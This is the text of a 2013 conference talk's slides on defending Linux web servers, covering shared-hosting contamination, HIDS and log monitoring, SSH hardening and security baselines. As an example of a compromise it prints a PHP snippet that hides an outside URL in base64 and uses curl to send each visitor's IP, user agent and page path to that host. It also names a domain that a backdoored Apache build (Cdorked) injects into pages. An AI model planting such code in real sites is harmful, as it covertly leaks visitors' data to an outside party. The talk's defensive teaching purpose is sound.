Tonimir Kiasondi, mag.inf, EUCIP Laboratory for Open Systems and Security Faculty of Organization and Informatics Varadin
#nmap -A tkisason.foi.hr
nmap scan report for tkisason.foi.hr Host is up (0.00033s latency). Not shown: 970 closed ports, 27 filtered ports PORT STATE SERVICE VERSION Security, Crypto, Open Systems kisasondi@gmail.com twitter: @kisasondi Skype:tkisason Open Systems and Security Lab Faculty of Organization and Informatics, Varadin
$ ls ~/talks/dorscluc2013
Don't talk about security, make a data science talk Crypto! HC security topic Let me just show some tips and tricks everyone should and can do
Exposure You need to plug every hole in your system Your attackers only need to find one hole
Trends:
Automated scanners / script kiddie hack tools keep getting better and more effective
Remember there is a black market for that stuff
Script kiddies are actually trying to learn something. Watering hole exploits / Client side exploits.
Please, kill Java
Contamination:
You spread your fail to other hosts. What happens when you are a little web dev company and you have 94 vhosts on a single machine.
Most are wordpress Most have misc (read: outdated) plugins A lot of custom PHP code (OWASP? What's that?) System isn't managed No security review/practice/vuln tracking No jailing / compartmentalization
Tip #1
Don't wait for a compromise to happen Set up your infrastructure early Prepare your system for the worst
Hardening / Security services Logging / Log mirroring Backups Be proactive (WAF, IDS, IPS, SIEM) Off site or offline config/source backups from a trusted source?
Example: Linux/Cdorked.A
Patched Apache, nginx, lighttpd binary
They also set the binary to be immutable Thanks!
No other "weird" files on disk Evil Apache loads some injections into requested pages:
http://894651446c103f0e.after1201.com
Tip #2
If you don't use rkhunter and chkrootkit... Start using an HIDS I like OSSEC:
File integrity checking (AIDE;debsums;rpm --verify) Log monitoring (petit / splunk / logstash) Rootkit detection (rkhunter / chkrootkit) Active response (fail2ban) No packaging :/
Useless if you don't monitor it's logs, use AnaLogi, use ANY log monitoring tool!
Failed password for root from 209.92.176.41 port 46864 ssh2 Failed password for root from 209.92.176.41 port 49866 ssh2 Failed password for root from 209.92.176.41 port 53300 ssh2 Failed password for root from 209.92.176.41 port 55774 ssh2 Failed password for root from 209.92.176.41 port 59157 ssh2 Failed password for root from 209.92.176.41 port 33723 ssh2
Tip #3
I don't even want to talk about password security Use ssh keys for remote login, disable password based auth and remote root logins in sshd.conf, use sudo for local root access. If you have a multiple user system, avoid contamination. A root pw od 123456 doesn't help! Watch out for file permissions!
Failed password for invalid user 2012eduworld2 from 83.212.118.74 port 58186 ssh2 Failed password for invalid user perfectpond. org from 83.212.118.74 port 59810 ssh2 Failed password for invalid user dna1admin from 83.212.118.74 port 51229 ssh2 Failed password for invalid user langliguo from 83.212.118.74 port 53687 ssh2 Failed password for invalid user bkalle from 83.212.118.74 port 58501 ssh2
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if ((strstr($sUserAgent, 'google') == false) AND (strstr($sUserAgent, 'yahoo') == false) AND (strstr($sUserAgent, 'baidu') == false) AND (strstr($sUserAgent, 'msn') == false) AND (strstr($sUserAgent, 'opera') == false) AND (strstr($sUserAgent, 'chrome') == false) AND (strstr($sUserAgent, 'bing') == false) AND (strstr($sUserAgent, 'safari') == false) AND (strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true AND isset ($_SERVER['HTTP_HOST']) == true) {
AND (strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true AND isset ($_SERVER['HTTP_HOST']) == true) { // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRG L3N0YXQucGhw').'?ip='.urlencode($_SERVER ['REMOTE_ADDR']).'&useragent='.urlencode ($sUserAgent).'&domainname='.urlencode($_SERVER ['HTTP_HOST']).'&fullpath='.urlencode($_SERVER ['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } }
Targeting
Attacks are getting more and more targeted Password reuse is the norm Attackers don't want to seed their exploit to a host that's not vulnerable Better evasion options Do you have HIDS / NIDS / SIEM? Train your people!
Good baselines:
NSA-IA Mitigation guidance:
http://www.nsa.gov/ia/mitigation_guidance/index.shtml
OWASP:
www.owasp.org
www.google.com
webservers
Disable all http requests you don't use (TRACE, OPTIONS, HEAD...?)
Watch out!
Use mod_security LXC is easy, try to separate your services as much as possible
It does have some problems (iptables conntrack) They can be fixed easily
end rant
I hope this talk will be useful to you. Educate yourself and your users, at least that isn't difficult. Prepare your systems, harden them while you still can.
Questions?
twitter: @kisasondi
Thank you
twitter: @kisasondi